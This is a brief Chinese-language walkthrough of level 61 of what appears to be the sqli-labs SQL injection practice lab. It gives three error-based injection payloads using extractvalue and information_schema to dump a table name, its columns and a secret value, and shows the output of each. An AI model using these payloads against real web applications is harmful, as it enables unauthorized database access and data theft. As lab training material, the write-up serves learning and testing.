第61关

通过'))闭合

报错注入

爆出表名
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e)) --+
z6ter7ezmy

爆出列名
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='z6ter7ezmy'),0x7e)) --+
id,sessid,secret_9ZT8,tryy

爆出信息
?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(secret_9ZT8) from z6ter7ezmy),0x7e)) --+
FuxK45TFZzyHEhfD1qHROT2l



闯关成功！！！